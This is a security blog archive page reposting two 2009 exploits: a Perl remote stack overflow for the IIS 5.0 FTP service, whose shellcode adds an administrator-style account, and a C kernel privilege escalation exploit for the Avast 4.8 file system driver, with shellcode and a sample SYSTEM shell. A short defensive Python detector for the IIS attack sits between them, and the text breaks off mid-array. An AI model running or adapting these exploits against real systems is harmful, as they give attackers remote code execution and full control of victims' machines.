Archive for the category "Cybersecurity".

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Vulnerability

      Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

      Not many servers still run IIS 5.0/6.0 on Windows 2000 these days; Windows 2003 is the mainstream.
      The end goal of this exploit code is to create an account on the system with the username "winown" and the password "nwoniw".
      The vulnerability was tested on Windows 2000 SP4 and affects IIS6 builds that have stack cookie protection.

Code:
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

# milw0rm.com [2009-08-31]
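From the defender's side, the command sequence the script above sends (SITE arguments padded to about 500 bytes, an MKD name carrying binary data, an NLST glob containing ../) is easy to spot on the FTP control channel. The following Python is an added example, not part of the original exploit post; the length thresholds and the sample session are constructed assumptions, with filler bytes in place of the shellcode.

```python
"""Flag FTP control-channel commands whose arguments look like the overlong
SITE / MKD / NLST payloads used against the IIS 5.0 FTP service.
Added defensive example; not code from the original post."""
import re
from dataclasses import dataclass

# Heuristic thresholds (assumed, not taken from the page): a legitimate
# directory name or SITE argument is far shorter than the ~500-byte and
# ~150-byte payloads the exploit script builds.
MAX_ARG_LEN = {"MKD": 128, "SITE": 128, "NLST": 128, "CWD": 128}
NON_PRINTABLE = re.compile(rb"[^\x20-\x7e]")   # anything outside printable ASCII
TRAVERSAL = re.compile(rb"\.\./|/\.\.")        # "../" style traversal in a glob


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list


def parse_command(raw: bytes):
    """Split one control-channel line into (verb, argument bytes)."""
    line = raw.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    return verb.upper().decode("ascii", "replace"), arg


def inspect_line(line_no: int, raw: bytes):
    """Return a Finding for a suspicious command line, or None if it looks benign."""
    verb, arg = parse_command(raw)
    reasons = []
    limit = MAX_ARG_LEN.get(verb)
    if limit is not None and len(arg) > limit:
        reasons.append(f"argument {len(arg)} bytes > {limit}")
    if NON_PRINTABLE.search(arg):
        reasons.append("non-printable bytes in argument")
    if verb == "NLST" and TRAVERSAL.search(arg):
        reasons.append("directory traversal in NLST glob")
    return Finding(line_no, verb, reasons) if reasons else None


def scan_session(lines):
    """Run inspect_line over a whole captured session; returns the findings in order."""
    findings = []
    for n, raw in enumerate(lines, 1):
        f = inspect_line(n, raw)
        if f:
            findings.append(f)
    return findings


# Constructed sample session mimicking the command order in the script above.
# Shellcode is replaced by a few filler bytes; nothing here is from a real capture.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS anonymous\r\n",
    b"MKD w00t1234\r\n",
    b"SITE KSEXY" + b"\x89\xe2\xda" + b"V" * 490 + b"\r\n",
    b"CWD w00t1234\r\n",
    b"MKD CCC" + b"\xb8\x55\x55" + b"\x7e\xf1\xfa\x7f" * 40 + b"\r\n",
    b"PORT 10,0,0,5,4,210\r\n",
    b"NLST \xb8\x55\x55*/../C*/\r\n",
]

if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print(f"line {f.line_no}: {f.command}: " + "; ".join(f.reasons))
```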

Please respect copyright when reposting; source: 秋天博客
Permalink: https://www.cfresh.net/web-security/98

Avast! 4.8.1335 Professional Local Kernel Buffer Overflow Vulnerability

      The file system filter driver in Avast! 4.8.1335 Professional has a local kernel buffer overflow vulnerability, which allows an intruder to gain SYSTEM privileges on Windows from a limited user account.

Code:
#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#include <conio.h>    /* getch(); missing from the original listing */

/*
Program          : avast! 4.8.1335 Professionnel
Homepage         : http://www.avast.com
Discovery        : 2009/07/29
Author Contacted : 2009/07/31
Found by         : Heurs
This Advisory    : Heurs
Contact          : heurs@ghostsinthstack.org

//—– Application description

avast! antivirus software represents complete virus protection,
offering full desktop security including a resident shield.
This antivirus is certified by both ICSA Labs and West Coast
Labs Checkmark.

//—– Description of vulnerability

The File System Filter driver is prone to a local kernel buffer overflow.
This vulnerability allows an intruder to gain SYSTEM privileges on a Windows
system from a limited user account.

//—– Proof Of Concept

http://www.sysdream.com/LocalEscalation_Avast.rar

//—– Credits

http://www.sysdream.com
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//—– Greetings

Virtualabs

//—–Exploitation

###############################################
Avast Kernel Buffer Overflow Vulnerability
Proof Of Concept…

===> Found : LocalEscalation_Avast.exe : 2676

Shellcode PID Uploaded !
Shellcode Redirect Uploaded !
Shellcode Stack Uploaded !
Connecting…    Found !
Handle : 0000001C
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\eleve\Bureau>whoami
SYSTEM
###############################################
*/

char UpdateAswMon [] = {
       0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00,
       0x00, 0x00, 0x00
   };

char ShellcodeMaster[] = "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";

char RealShellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
"\x15\xf3\x1d\xb8";

int GetPidByName(char * name_Proc) {
    PROCESSENTRY32 PEntry;
    HANDLE hTool32;

    PEntry.dwSize = sizeof(PROCESSENTRY32);
    hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hTool32 == INVALID_HANDLE_VALUE) {
        printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)");
        getch();
        exit(0);
    }
    if(!Process32First(hTool32, &PEntry)) {
        printf("\nError ==> Process32First(hTool32, &PEntry)");
        getch();
        exit(0);
    }
    if (!strcasecmp(PEntry.szExeFile, name_Proc)) {
        CloseHandle(hTool32);
        printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
        return PEntry.th32ProcessID;
    }
    //printf(   "\n               Process  :  PID\n");
    while(Process32Next(hTool32, &PEntry) != 0){
        if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) {
            CloseHandle(hTool32);
            printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
            return PEntry.th32ProcessID;
        }
        //printf("===> Trouver : %s : %d\n", PEntry.szExeFile, PEntry.th32ProcessID);
    }
    printf("\n%s n'a pas ete trouve.", name_Proc);
    getch();
    exit(0);
}

void MajShellcode(char * ProcessName){
     DWORD ProcessID;
     DWORD MagicWord = 0x41414141;
     int i;
    
     ProcessID = GetPidByName(ProcessName);
     for (i=0; i<sizeof(ShellcodeMaster); i++) {
         if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
            ShellcodeMaster[i] = (DWORD) ProcessID & 0x000000FF;
            ShellcodeMaster[i+1] = ((DWORD) ProcessID & 0x0000FF00) >> 8;
            ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16;
            ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24;
            printf("Shellcode PID Uploaded !\n");
            return;
         }
     }
     printf("Shellcode PID NOT Uploaded :\'(\n");
     return;
}

void MajRealShellcode(){
     int i;
     DWORD MagicWord = 0x11111111;
    
     for (i=0; i<sizeof(ShellcodeMaster); i++) {
         if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
            ShellcodeMaster[i] = (DWORD) &RealShellcode & 0x000000FF;
            ShellcodeMaster[i+1] = ((DWORD) &RealShellcode & 0x0000FF00) >> 8;
            ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16;
            ShellcodeMaster[i+3] = ((DWORD) &RealShellcode & 0xFF000000) >> 24;
            printf("Shellcode Redirect Uploaded !\n");
            return;
         }
     }
     printf("Shellcode Redirect NOT Uploaded :\'(\n");
     return;
}

int FindStack(){
     __asm__(
       "mov %eax, %esp\n\t"
       "leave\n\t"
       "ret\n\t"
       );
}

void MajRealStack(){
     int i;
     DWORD MagicWord = 0x22222222;
     DWORD StackLocation = FindStack();
    
     for (i=0; i<sizeof(ShellcodeMaster); i++) {
         if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
            ShellcodeMaster[i] = (DWORD) &StackLocation & 0x000000FF;
            ShellcodeMaster[i+1] = ((DWORD) &StackLocation & 0x0000FF00) >> 8;
            ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16;
            ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24;
            printf("Shellcode Stack Uploaded !\n");
            return;
         }
     }
     printf("Shellcode NOT Uploaded :\'(\n");
     return;
}

void AfficherListeFichiers(void) {
    HANDLE hFind;
    WIN32_FIND_DATAW FindData;
    char Dossier[1024] = ".";   // left uninitialised in the original; "." keeps the current directory

    // Change directory
    SetCurrentDirectory(Dossier);

    // Start the search
    hFind=FindFirstFileW(L"*.*", &FindData);
    if (hFind!=INVALID_HANDLE_VALUE)
    {
        // If the entry found is a file rather than a directory, print its name
        printf("%ws\n",FindData.cFileName);
        // Remaining entries
        while (FindNextFileW(hFind, &FindData))
        {
            printf("%ws\n",FindData.cFileName);
        }
    }
    // End of search
    FindClose(hFind);
}

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD InitVal=0;
    char welcome[1024], out[50];
    DWORD Crashing []={
        0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72,
        0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d,
        0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c,
        0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b,
        0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991,
        0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb,
        0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a,
        0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac,
        0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0,
        0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9,
        0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361,
        0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a,
        0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e,
        0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332,
        0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f,
        0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a,
        0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7,
        0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263,
        0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8,
        0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063,
        0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635,
        0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7,
        0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc,
        0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55,
        0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c,
        0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6,
        0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661,
        0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa,
        0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae,
        0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea,
        0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9,
        0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c,
        0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a,
        0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5,
        0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3,
        0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56,
        0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e,
        0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf,
        0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a,
        0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a,
        0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0,
        0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac,
        0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779,
        0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd,
        0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd,
        0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2,
        0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373,
        0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628,
        0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22,
        0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d,
        0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984,
        0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449,
        0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36,
        0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9,
        0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814,
        0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf,
        0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9,
        0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2,
        0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3,
        0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e,
        0x32685945, 0x55016b49, 0x994f9293, 0x599f9653,
        0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847,
        0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906,
        0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da,
        0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a,
        0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7,
        0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c,
        0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10,
        0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7,
        0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636,
        0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480,
        0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948,
        0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038,
        0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3,
        0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c,
        0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653,
        0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed,
        0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496,
        0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816,
        0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca,
        0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84,
        0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4,
        0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c,
        0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98,
        0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee,
        0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12,
        0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4,
        0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc,
        0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec,
        0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5,
        0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1,
        0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530,
        0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c,
        0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5,
        0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111,
        0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead,
        0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96,
        0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712,
        0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424,
        0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4,
        0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278,
        0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6,
        0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776,
        0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea,
        0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a,
        0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d,
        0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca,
        0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69,
        0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208,
        0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad,
        0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97,
        0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d,
        0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115,
        0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642,
        0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f,
        0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3,
        0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920,
        0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c,
        0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070,
        0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65,
        0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92,
        0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1,
        0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3,
        0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a,
        0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd,
        0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762,
        0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455,
        0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977,
        0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db,
        0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b,
        0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18,
        0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b,
        0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0,
        0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd,
        0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35,
        0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110,
        0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f,
        0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84,
        0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6,
        0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2,
        0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265,
        0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49,
        0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c,
        0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9,
        0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b,
        0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3,
        0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc,
        0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a,
        0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9,
        0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171,
        0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3,
        0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31,
        0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e,
        0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87,
        0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b,
        0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c,
        0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42,
        0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0,
        0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4,
        0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb,
        0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069,
        0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5,
        0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9,
        0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370,
        0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529,
        0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60,
        0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787,
        0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9,
